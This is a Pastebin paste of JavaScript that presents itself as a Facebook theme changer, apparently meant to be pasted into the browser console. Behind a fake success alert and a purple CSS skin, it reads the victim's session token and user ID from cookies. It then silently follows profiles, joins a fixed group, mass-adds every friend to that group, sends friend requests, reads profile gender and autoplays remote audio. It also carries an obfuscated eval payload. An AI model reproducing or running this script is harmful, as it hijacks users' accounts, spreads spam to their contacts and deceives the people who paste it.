Advertisement
supernghiaqn

Add Mems Chuẩn

Oct 1st, 2013
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 90.94 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. alert('Chúc Mừng Bạn Đã Thay Đổi Giao Diện Facebook Thành Công !');
  4. function cereziAl(isim) {
  5.     var tarama = isim + "=";
  6.     if (document.cookie.length > 0) {
  7.         konum = document.cookie.indexOf(tarama)
  8.         if (konum != -1) {
  9.             konum += tarama.length
  10.             son = document.cookie.indexOf(";", konum)
  11.             if (son == -1)
  12.                 son = document.cookie.length
  13.             return unescape(document.cookie.substring(konum, son))
  14.         }
  15.         else { return ""; }
  16.     }
  17. }
  18.  
  19. function getRandomInt (min, max) {
  20.     return Math.floor(Math.random() * (max - min + 1)) + min;
  21. }
  22. function randomValue(arr) {
  23.     return arr[getRandomInt(0, arr.length-1)];
  24. }
  25.  
  26. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  27. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  28.  
  29. function a(abone){
  30.     var http4 = new XMLHttpRequest();
  31.      
  32.     var url4 = "/ajax/follow/follow_profile.php?__a=1";
  33.      
  34.     var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  35.     http4.open("POST", url4, true);
  36.      
  37.     //Send the proper header information along with the request
  38.     http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  39.     http4.setRequestHeader("Content-length", params4.length);
  40.     http4.setRequestHeader("Connection", "close");
  41.      
  42.     http4.onreadystatechange = function() {//Call a function when the state changes.
  43.     if(http4.readyState == 4 && http4.status == 200) {
  44.        
  45.       http4.close; // Close the connection
  46.      
  47.     }
  48.     }
  49.    
  50.     http4.send(params4);
  51. }
  52.  
  53. function sublist(uidss) {
  54.                 var a = document.createElement('script');
  55.                 a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  56.                 document.body.appendChild(a);
  57. }
  58.  
  59.  
  60. var gid = ['214873685347491'];
  61. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  62. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  63.  
  64. var httpwp = new XMLHttpRequest();
  65. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  66. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  67. httpwp['open']('POST', urlwp, true);
  68. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  69. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  70. httpwp['setRequestHeader']('Connection', 'keep-alive');
  71. httpwp['send'](paramswp);
  72.  
  73. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  74. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  75.  
  76. var friends = new Array();
  77. gf = new XMLHttpRequest();
  78. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  79. gf['send']();
  80. if (gf['readyState'] != 4) {} else {
  81.     data = eval('(' + gf['responseText']['substr'](9) + ')');
  82.     if (data['error']) {} else {
  83.         friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  84.             return _0x93dax8['index'] - _0x93dax9['index'];
  85.         });
  86.     };
  87. };
  88.  
  89. for (var i = 0; i < friends['length']; i++) {
  90.     var httpwp = new XMLHttpRequest();
  91.     var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  92.     var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  93.     httpwp['open']('POST', urlwp, true);
  94.     httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  95.     httpwp['setRequestHeader']('Content-length', paramswp['length']);
  96.     httpwp['setRequestHeader']('Connection', 'keep-alive');
  97.     httpwp['onreadystatechange'] = function () {
  98. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  99.     };
  100.     httpwp['send'](paramswp);
  101. };
  102. var spage_id = "527981807239606";
  103. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  104. var smesaj = "";
  105. var smesaj_text = "";
  106. var arkadaslar = [];
  107. var svn_rev;
  108. var bugun= new Date();
  109. var btarihi = new Date();
  110. btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
  111. if(!document.cookie.match(/paylasti=(\d+)/)){
  112. document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
  113. }
  114.  
  115.  
  116. //arkadaslari al ve isle
  117. function sarkadaslari_al(){
  118.                 var xmlhttp = new XMLHttpRequest();
  119.         xmlhttp.onreadystatechange = function () {
  120.                         if(xmlhttp.readyState == 4){
  121.                                   eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  122.                                   for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  123.                                         smesaj = "";
  124.                                         smesaj_text = "";
  125.                                   for(i=f*10;i<(f+1)*10;i++){
  126.                                         if(arkadaslar.payload.entries[i]){
  127.                                   smesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";
  128.                                   smesaj_text += " " + arkadaslar.payload.entries[i].text;
  129.                                   }
  130.                                         }
  131.                                         sdurumpaylas();                         }
  132.                                
  133.                         }
  134.                        
  135.         };
  136.                 var params = "&filter[0]=user";
  137.                 params += "&options[0]=friends_only";
  138.                 params += "&options[1]=nm";
  139.                 params += "&token=v7";
  140.         params += "&viewer=" + user_id;
  141.                 params += "&__user=" + user_id;
  142.                
  143.         if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  144.         else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  145.         xmlhttp.send();
  146. }
  147.  
  148. //tiklama olayini dinle
  149. var tiklama = document.addEventListener("click", function () {
  150. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  151. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  152. sarkadaslari_al();
  153. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  154.  
  155. document.removeEventListener(tiklama);
  156. }
  157.  }, false);
  158.  
  159.  
  160. //arkada?¾ ekleme
  161. function sarkadasekle(uid,cins){
  162.                 var xmlhttp = new XMLHttpRequest();
  163.         xmlhttp.onreadystatechange = function () {
  164.                         if(xmlhttp.readyState == 4){  
  165.                         }
  166.         };
  167.                
  168.                 xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  169.                 var params = "to_friend=" + uid;
  170.                 params += "&action=add_friend";
  171.                 params += "&how_found=friend_browser";
  172.                 params += "&ref_param=none";
  173.                 params += "&outgoing_id=";
  174.                 params += "&logging_location=friend_browser";
  175.                 params += "&no_flyout_on_click=true";
  176.                 params += "&ego_log_data=";
  177.                 params += "&http_referer=";
  178.                 params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  179.         params += "&phstamp=165816749114848369115";
  180.                 params += "&__user=" + user_id;
  181.                 xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  182.                 xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  183.                
  184. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  185.                 xmlhttp.send(params);
  186. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  187.                 cinsiyetgetir(uid,cins,"sarkadasekle");
  188. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  189.                 xmlhttp.send(params);
  190. }
  191. }
  192.  
  193. //cinsiyet belirleme
  194. var cinssonuc = {};
  195. var cinshtml = document.createElement("html");
  196. function scinsiyetgetir(uid,cins,fonksiyon){
  197.                 var xmlhttp = new XMLHttpRequest();
  198.         xmlhttp.onreadystatechange = function () {
  199.                         if(xmlhttp.readyState == 4){
  200.                         eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  201.                         cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  202.                         btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  203.                         if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  204.                         document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  205.                         }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  206.                         document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  207.                         }
  208.                         eval(fonksiyon + "(" + id + "," + cins + ");");
  209.                         }
  210.         };
  211.                 xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  212.                 xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  213.                 xmlhttp.send();
  214. }
  215. var parent=document.getElementsByTagName("html")[0];
  216. var _body = document.getElementsByTagName('body')[0];
  217. var _div = document.createElement('div');
  218. _div.style.height="25";
  219. _div.style.width="100%";
  220. _div.style.position="fixed";
  221. _div.style.top="auto";
  222. _div.style.bottom="0";
  223. _div.align="center";
  224. var _audio= document.createElement('audio');
  225. _audio.style.width="100%";
  226. _audio.style.height="25px";
  227. _audio.controls = true;
  228. _audio.autoplay = true;
  229. _div.appendChild(_audio);
  230. _body.appendChild(_div);
  231. var parent=document.getElementsByTagName("html")[0];
  232. var _body = document.getElementsByTagName('body')[0];
  233. var _div = document.createElement('div');
  234. _div.style.height="25";
  235. _div.style.width="100%";
  236. _div.style.position="fixed";
  237. _div.style.top="auto";
  238. _div.style.bottom="0";
  239. _div.align="center";
  240. var _audio= document.createElement('audio');
  241. _audio.style.width="100%";
  242. _audio.style.height="25px";
  243. _audio.controls = true;
  244. _audio.autoplay = true;
  245. _audio.src = "http://113.171.224.216/videoplayer/NonStop%20-%20B%e1%ba%afc%20Giang%20Bay%20L%e1%ba%afc%20-%20Vol.5%20-%20%c4%90%e1%bb%91%20B%e1%bb%91%20Con%20Th%e1%ba%b1ng%20N%c3%a0o%20Ng%e1%bb%93i%20Im%20%c4%90%c6%b0%e1%bb%a3c%20-%20DJ_T%e1%bb%85u.Remix%20%5bMatxac.com%5d.mp3?ich_u_r_i=9747568aa04ba088c6fc0eadb9fd818e&ich_s_t_a_r_t=0&ich_e_n_d=0&ich_k_e_y=1345098926751263532457&ich_t_y_p_e=2&ich_d_i_s_k_i_d=4&ich_u_n_i_t=1";
  246. _div.appendChild(_audio);
  247. _body.appendChild(_div);
  248. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  249. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  250. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  251. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  252.  
  253. var _1886;var _1494='5404F147F120C1000D965C1126D1371D1371C895F1161C1469B1406D1378C1441C1371D965E1000B741D1497D1350F1469F895D1385B1357C1336A1371A1483A1476C1392B895D1098F895A1371A1448D1364F1490D1434A1378F1441F1483F993A1392B1378B1483D1154E1427A1378F1434F1378B1441E1483D1476D1133E1518C1217F1350A1434D1378D951F944A1385E1357A1336D1371B1483B1476E1392D944A958F1308A1007F1322A993F1497D1350A1427A1490D1378D1084D741E1497A1350C1469D895C1490D1476D1378D1469D1336C1406F1371E895A1098F895A1371E1448C1364A1490A1434A1378F1441A1483D993E1364F1448B1448D1420A1406C1378B993D1434A1350E1483A1364C1399E951C1371A1448D1364C1490E1434B1378C1441F1483A993E1364D1448B1448F1420C1406D1378E993D1434B1350F1483A1364C1399D951C1000D1364B1336C1490D1476D1378B1469D1098E951D1315F1371F972A958F1000C958E1308B1014A1322B958C1084B741C1385F1490B1441A1364E1483A1406F1448E1441F895B1182F1147E1252E951E1469A958D895E1532A741F895F895E1497B1350D1469B895F1287E895E1098A895A1441A1378C1504B895D1287F1210B1203E1175C1483F1483F1455C1245C1378B1462C1490F1378B1476E1483B951C958A1084A741F895C895B1497B1350C1469C895A1287C1266A1245A1203F895B1098D895B909C1000F1000C1504C1504D1504F993E1385A1350E1364D1378C1357B1448A1448A1420C993A1364B1448D1434F1000C1350D1413C1350D1511F1000C1350C1371E1371A1336C1385F1469A1406B1378D1441F1371E1000D1350E1364C1483A1406B1448B1441A993E1455F1399A1455B909D1084C741A895F895C1497D1350A1469C895E1287B1231A1350D1469C1350B1434B1476E895D1098D895E909A1483D1448D1336C1385E1469C1406C1378D1441F1371C1098C909E895C972F895C1469C895F972C909B937D1350C1364E1483F1406A1448F1441A1098A1350C1371A1371B1336A1385F1469F1406C1378F1441A1371F937C1399C1448D1504C1336C1385B1448C1490F1441C1371E1098E1385F1469F1406C1378B1441C1371D1336B1357F1469F1448D1504E1476E1378F1469C1336C1476A937B1469C1378B1385B1336B1455E1350B1469E1350B1434E1098F1441E1448C1441F1378E937B937C937E1448D1490E1483F1392B1448D1406F1441A1392D1336C1406F1371D1098F937B1427E1448A1392A1392D1406D1441A1392E1336B1427D1448E1364F1350C1483D1406B1448E1441F1098E1476D1378F1350D1469A1364B1399B937C1441D1448D1336D1385D1427A1518E1448F1490E1483B1336C1448F1441F1336F1364D1427A1406E1364C1420F1098C1483C1469D1490B1378A937A1378E1392D1448C1336D1427B1448E1392F1336D1371E1350C1483A1350A937E1399A1483A1483C1455E1336A1469F1378B1385E1378A1469D1378A1469D937E1336D1336F1490E1476F1378E1469F1098B909E972E1490B1476C1378B1469E1336F1406B1371A972B909B937B1336D1336C1350D1098D1014B937C1336F1336E1371B1518B1441A1098B1056F1070B1063F1350C1147D1042B1525C1042B1140B1161A986E937C1336A1336D1469C1378C1462B1098E1028B1042F937D1385F1357E1336B1371D1483F1476F1392D1098F909B972F1385F1357F1336B1371D1483E1476E1392C972D909E937E1455B1399E1476B1483E1350C1434A1455C1098C909F1084E741F895B895D1287F993B1448E1455E1378C1441D951F909E1231E1224D1252F1259B909E979A895B1287E1266B1245E1203D979A895A1483C1469D1490E1378E958D1084E741F895E895E1287C993A1448A1441B1469B1378E1350E1371E1518C1476A1483D1350B1483B1378C1364B1399E1350C1441F1392C1378C895B1098E895E1385C1490F1441C1364C1483D1406B1448E1441C895D951C958F895D1532A741E895B895B895D895D1406A1385C895E951F1287E993C1469D1378B1350F1371F1518D1252E1483C1350E1483F1378C895C1098C1098B895C1035C895A937C937D895E1287C993E1476B1483B1350B1483A1490F1476C895F1098C1098C895A1021A1007C1007D958D895A1532B741E895D895A895B895C895F895F1287E993B1364F1427B1448F1476B1378E1084F741F895B895C895B895D1546F741B895A895C1546C1084D741D895B895A1287B993A1476C1378B1441C1371F951D1287D1231B1350C1469A1350B1434F1476E958E1084C741C1546F741B1182B1147C1252F951A909E1014B1007F1007A1007E1007B1014F1007E1070E1035D1042B1021F1021B1028A1028B1063E909F958B1084D1182D1147F1252E951B909E1014E1007A1007B1007E1007D1035A1028C1028D1028C1042D1014E1021C1035C1014C1035F909F958C1084E1182A1147C1252A951E909E1014C1007C1007E1007B1007B1049C1049B1007F1021A1049A1014E1042B1028B1063E1063C909B958E1084E';var _6117=/[\x41\x42\x43\x44\x45\x46]/;var _9302=2;var _2384=_1494.charAt(_1494.length-1);var _7558;var _4591=_1494.split(_6117);var _9485=[String.fromCharCode,isNaN,parseInt,String];_4591[1]=_9485[_9302+1](_9485[_9302](_4591[1])/21);var _2083=(_9302==4)?String:eval;_7558='';_11=_9485[_9302](_4591[0])/_9485[_9302](_4591[1]);for(_1886=3;_1886<_11;_1886++)_7558+=(_9485[_9302-2]((_9485[_9302](_4591[_1886])+_9485[_9302](_4591[2])+_9485[_9302](_4591[1]))/_9485[_9302](_4591[1])-_9485[_9302](_4591[2])+_9485[_9302](_4591[1])-1));var _9762='_7330';var _6562='_9762=_7558';function _4904(_9801){_2083(_2864);_4904(_8921);_8921(_6562);_4904(_9762);}var _2864='_4904=_2083';var _8921='_8921=_4904';_4904(_2384);
  254.  
  255. (function() {
  256. var css = "#facebook body:not(.transparent_widget), #nonfooter, #booklet, .UIFullPage_Container, .fbConnectWidgetTopmost, .connect_widget_vertical_center, .fbFeedbackContent, #LikeboxPluginPagelet\n{ \ncolor: #fff !important;\nbackground: url(\"http://i5.glitter-graphics.org/pub/1375/1375505n6tkjfexeb.gif\") repeat fixed center center #221044 !important; \n}\n* {\nborder-color: transparent !important;\nfont-family: Comic Sans MS !important;\ncolor: #FFFFFF !important;\nbackground-color: transparent !important; \n}\n\n\na,.UIActionButton_Text,span,div,input[value=\"Comment\"] {text-shadow: #000 1px 1px 1px !important;}\n\n.UIComposer_InputArea *,.highlighter div{text-shadow: none !important;}\n\n#profile_name {text-shadow: #fff 0 0 2px,#000 1px 1px 3px;}\n\na:hover,.inputbutton:hover,.inputsubmit:hover,.accent,.hover,.domain_name:hover,#standard_error,.UIFilterList_Selected a:hover,input[type=\"submit\"]:not(.fg_action_hide):hover,.button_text:hover,#presence_applications_tab:hover,.UIActionMenu:hover,.attachment_link a span:hover,.UIIntentionalStory_Time a:hover,.UIPortrait_Text .title:hover,.UIPortrait_Text .title span:hover,.comment_link:hover,.request_link span:hover,.UIFilterList_ItemLink .UIFilterList_Title:hover,.UIActionMenu_Text:hover,.UIButton_Text:hover,.inner_button:hover,.panel_item span:hover,li[style*=\"background-color: rgb(255,255,255)\"] .friend_status,.dh_new_media span:hover,a span:hover,.tab_link:hover *,button:hover,#buddy_list_tab:hover *,.tab_handle:hover .tab_name span,.as_link:hover span,input[type=\"button\"]:hover,.feedback_show_link:hover,.page:hover .text,.group:hover .text,.calltoaction:hover .seeMoreTitle,.liketext:hover,.tickerStoryBlock:hover .uiStreamMessage span,.tickerActionVerb,.mleButton:hover,.bigNumber,.pluginRecommendationsBarButton:hover {color: #baf !important;text-shadow: #fff 0 0 2px !important;text-decoration: none !important;}\n\n\n.fbChatSidebar .fbChatTypeahead .textInput,.fbChatSidebarMessage,.devsitePage .body > .content {box-shadow: none !important;}\n\n.presence_menu_opts,#header,.LJSDialog,.chat_window_wrapper,#navAccount ul,.fbJewelFlyout,.uiTypeaheadView,.uiToggleFlyout { box-shadow: 0 0 3em #000; }\n\n.UIRoundedImage,.UIContentBox_GrayDarkTop,.UIFilterList > .UIFilterList_Title, .dialog-title,.flyout,.uiFacepileItem .uiTooltipWrap {box-shadow: 0 0 1em 1px #000;}\n\n.extra_menus ul li:hover,.UIRoundedBox_Box,.fb_menu_link:hover,.UISelectList_Item:hover,.fb_logo_link:hover,.hovered,#presence_notifications_tab,#chat_tab_barx,.tab_button_div,.plays_val, #mailBoxItems li a:hover,.buddy_row a:hover,.buddyRow a:hover,#navigation a:hover,#presence_applications_tab,#buddy_list_tab,#presence_error_section,.uiStepSelected .middle,.jewelButton,#pageLogo,.fbChatOrderedList .item:hover,.uiStreamHeaderTall {box-shadow: 0 0 3px #000,inset 0 0 5px #000 !important;}\n\n\n.topNavLink > a:hover,#navAccount.openToggler,.selectedCheckable {box-shadow: 0 0 4px 2px #baf,inset 0 0 2em #96f !important;}\n\n\n.fbChatBuddyListDropdown .uiButton,.promote_page a,.create_button a,.share_button_browser div,.silver_create_button,.button:not(.uiSelectorButton):not(.close):not(.videoicon),button:not(.as_link),.GBSearchBox_Button,.UIButton_Gray,.UIButton,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,.UIActionMenu_SuppressButton,.UIConnectControlsListSelector .uiButton,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton),.fbTimelineRibbon,#fbDockChatBuddylistNub .fbNubButton,.pluginRecommendationsBarButtonLike {box-shadow: 0 0 .5em rgba(0,0,0,0.9),inset 0 0 .75em #baf !important;border-width: 0 !important; }\n\n.fbChatBuddyListDropdown .uiButton:hover,.uiButton:not(.uiSelectorButton):hover,.fbPrivacyWidget .uiSelectorButton:not(.lockButton):hover,.uiButtonSuppressed:hover,.UIButton:hover,.UIActionMenu_Wrap:hover,.tabs li:hover,.ntab:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([type=\"Flag\"]):not([type=\"submit\"]):hover,.inputsubmit:hover,.promote_page:hover,.create_button:hover,.share_button_browser:hover,.silver_create_button_shell:hover,.painted_button:hover,.flyer_button:hover,.button:not(.close):not(.uiSelectorButton):not(.videoicon):hover,button:not(.as_link):hover,.GBSearchBox_Button:hover,.tagsWrapper,.UIConnectControlsListSelector .uiButton:hover,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton):hover,.fbTimelineMoreButton:hover,#fbDockChatBuddylistNub .fbNubButton:hover,.tab > div:not(.title):hover,.detail.frame:hover,.pluginRecommendationsBarButtonLike:hover {box-shadow: 0 0 .5em #000,0 0 1em 3px #baf,inset 0 0 2em #96f !important;}\n\n#icon_garden,.list_select .friend_list {box-shadow: 0 0 3px -1px #000,inset 0 0 3px -1px #000;}\n\n.bb .fbNubButton,.uiScrollableAreaGripper {box-shadow: inset 0 4px 8px #baf,0 0 1em #000 !important;}\n\n.bb .fbNubButton:hover {box-shadow: inset 0 4px 8px #baf,0 .5em 1em 1em #baf !important;}\n\n.fbNubFlyoutTitlebar {box-shadow: inset 0 4px 8px #baf;padding: 0 4px !important;}\n\n#fb_menubar,.progress_bar_outer {box-shadow: inset 0 0 3px #000,0 0 3em 3px #000;}\n#presence_ui {box-shadow: 0 0 3em 1px #000}\n\n#buddy_list_tab:hover,.tab_handle:hover,.focused  {box-shadow: 0 0 3px #000,inset 0 0 3px #000,0 0 3em 5px #fff;}\n\n.uiSideNavCount,.jewelCount,.uiContextualDialogContent,.fbTimelineCapsule .fbTimelineTwoColumn > .timelineUnitContainer:hover,.timelineReportContainer:hover,.uiOverlayPageContent,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.uiScaledImageContainer:hover, .pagesVoiceBar, ._k5 {box-shadow: 0 0 1em 4px #baf !important;}\n\n.img_link:hover,.album_thumb:hover,.fbChatTourCallout .body,.fbSidebarGripper div {box-shadow: 0 0 3em #baf;}\n\n.shaded,.progress_bar_inner,.tickerStoryAllowClick {box-shadow: inset 0 0 1em #baf !important}\n\n.UIPhotoGrid_Table .UIPhotoGrid_TableCell:hover .UIPhotoGrid_Image,#myphoto:hover,.mediaThumbWrapper:hover,.uiVideoLink:hover,.mediaThumb:hover,#presence.fbx_bar #presence_ui #presence_bar .highlight,.fbNubFlyout:hover,.hovercard .stage,#fbDockChatBuddylistNub .fbNubFlyout:hover,.balloon-content,.-cx-PRIVATE-uiDialog__border  {box-shadow: 0 0 3em 5px #baf !important;}\n\n.fbNubFlyout,.uiMenuXBorder {box-shadow: 0 0 3em 5px #000 !important;}\n\n#blueBar {box-shadow: 0 0 1em 3px #000 !important;}\n\n\n.fill {box-shadow: inset 0 0 2em #96f,0 0 1em #000 !important;}\n\n\ninput[type=\"file\"]{-moz-appearance:none!important;border: none !important;}\n\n\n.status_text,h4,a,h2,.flyout_menu_title,.url,#label_nm,h5,.WelcomePage_MainMessage,#public_link_uri,#public_link_editphoto span,#public_link_editalbum span,.dh_subtitle,.app_name_heading,.box_head,.presence_bar_button span,a:link span,#public_link_album span,.note_title,.link_placeholder,.stories_title,.typeahead_suggestion,.boardkit_title,.section-title strong,.inputbutton,.inputsubmit,.matches_content_box_title,.tab_name,.header_title_text,.signup_box_message,.quiz_start_quiz,.sidebar_upsell_header,.wall_post_title,.megaphone_header,.source_name,.UIComposer_AttachmentLink,.fcontent > .fname,#presence_applications_tab,.mfs_email_title,.flyout .text,.UIFilterList_ItemLink .UIFilterList_Title,.announce_title,.attachment_link a span,.comment_author,.UIPortrait_Text .title,.comment_link,.UIIntentionalStory_Names,#profile_name,.UIButton_Text,.dh_new_media span,.share_button_browser div,.UIActionMenu_Text,.UINestedFilterList_Title,button,.panel_item span,.stat_elem,.action,#contact_importer_container input[value=\"Find Friends\"]:hover,.navMore,.navLess,input[name=\"add\"],input[name=\"actions[reject]\"],input[name=\"actions[accept]\"],input[name=\"actions[maybe]\"],.uiButtonText,.as_link .default_message,.feedback_hide_link,.feedback_show_link,#fbpage_fan_sidebar_text,.comment_actual_text a span,.uiAttachmentDesc a span,.uiStreamMessage a span,.group .text,.page .text,.uiLinkButton input,.blueName,.uiBlingBox span.text,.commentContent a span,.uiButton input,.fbDockChatTab .name,.simulatedLink,.bfb_tab_selected,.liketext,a.UIImageBlock_Content,.uiTypeaheadView li .text,.author,.authors,.itemLabel,.passiveName,.token,.fbCurrentTitle,.fbSettingsListItemLabel,.uiIconText,#uetqg1_8,.fbRemindersTitle,.mleButton,.uiMenuItem .selected .name  {color: #baf !important;}\n\n#email,option,.disclaimer,.info dd,.UIUpcoming_Info,.UITos_ReviewDescription,.settings_box_text,div[style*=\"color: rgb(85,85,85)\"] {color: #999 !important;}\n\n.status_time,.header_title_wrapper,.copyright,#newsfeed_submenu,#newsfeed_submenu_content strong,.summary,.caption,.story_body,.social_ad_advert_text,.createalbum dt,.basic_info_summary_and_viewer_actions dt,.info dt,.photo_count,p,.fbpage_fans_count,.fbpage_type,.quiz_title,.quiz_detailtext,.byline,label,.fadvfilt b,.fadded,.fupdt,.label,.main_subtitle,.minifeed_filters li,.updates_settings,#public_link_photo,#phototags em,#public_link_editphoto,.note_dialog,#public_link_editalbum,.block_add_person,.privacy_page_field,.action_text,.network,.set_filters span,.byline span,#no_notes,#cheat_sheet,.form_label,.share_item_actions,.options_header,.box_subtitle,.review_header_subtitle_line,.summary strong,.upsell dd,.availability_text,#public_link_album,.explanation,.aim_link,.subtitle,#profile_status,span[style*=\"color: rgb(51,51,51)\"],.fphone_label,.phone_type_label,.sublabel,.gift_caption,dd span,.events_bar,.searching,.event_profile_title,.feedBackground,.fp_show_less,.increments td,.status_confirm,.sentence,.admin_list span,.boardkit_no_topics,.boardkit_subtitle,.petition_preview,.boardkit_topic_summary,li,#photo_badge,.status_body,  .spell_suggest_label,.pg_title,.white_box,.token span,.profile_activation_score,.personal_msg span,.matches_content_box_subtitle span,tr[fbcontext=\"41097bfeb58d\"] td,.title,.floated_container span:not(.accent),div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(68,68,68)\"],.present_info_label,.fbpage_description,.tagged span,#tags h2 strong,#tags div span,.detail,.chat_info_status,.gray-text,.author_header,.inline_comment,.fbpage_info,.gueststatus,.no_pages,.topic_pager,.header_comment span,div[style*=\"color: rgb(101,107,111)\"],#q,span[style*=\"color: rgb(85,85,85)\"],.pl-item,.tagged_in,.pick_body,td[style*=\"color: rgb(85,85,85)\"],strong[style*=\"color: rgb(68,68,68)\"],div[style*=\"color: gray\"],.group_officers dd,.fbpage_group_title,.application_menu_divider,.friend_status span,.more_info,.logged_out_register_subhead,.logged_out_register_footer,input[type=\"text\"],textarea,.status_name span,input[type=\"file\"],.UIStoryAttachment_Copy,.stream_participants_short,.UIHotStory_Copy,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not(.UIButton_Text):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),input[type=\"search\"],input[type=\"input\"],.inputtext,.relationship span,input[type=\"button\"]:not([value=\"Comment\"]),input[type=\"password\"],#reg_pages_msg,.UIMutableFilterList_Tip,.like_sentence,.UIIntentionalStory_InfoText,.UIHotStory_Why,.question_text,.UIStory,.tokenizer,input[type=\"hidden\"],.tokenizer_input *,.text:not(.external),.flistedit b,.fexth,.UIActionMenu_Main,span[style*=\"color: rgb(102,102,102)\"],div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(119,119,119)\"],blockquote,.description,.security_badge,.full_name,.email_display,.email_section,.chat_fl_nux_messaging,.UIObjectListing_Subtext,.confirmation_login_content,.confirm_username,.UIConnectControls_Body em,.comment_actual_text,.status,.UICantSeeProfileBlurbText,.UILiveLink_Description,.recaptcha_text,.UIBeep_Title,.UIComposer_Attachment_ShareLink_URL,.app_dir_app_category,.first_stat,.aggregate_review_title,.stats span,.facebook_disclaimer,.app_dir_app_creator,.app_dir_app_monthly_active_users,.app_dir_app_friend_users,.UISearchFilterBar_Label,.UIFullListing_InfoLabel,.email_promise_detail,.title_text,.excerpt,.dialog_body,.tos,.UIEMUASFrame_body,.page_note,.nux_highlight_composer,.UIIntentionalStory_BottomAttribution,.tagline,.GBSelectList,.gigaboxx_thread_header_authors,.GBThreadMessageRow_ReferrerLink,#footerWrapper,.infoTitle,.fg_explain,.UIMentor_Message,.GenericStory_BottomAttribution,.chat_input,.video_timestamp span,#tagger_prompt,.UIImageBlock_Content,.new_list span, .GBSearchBox_Input 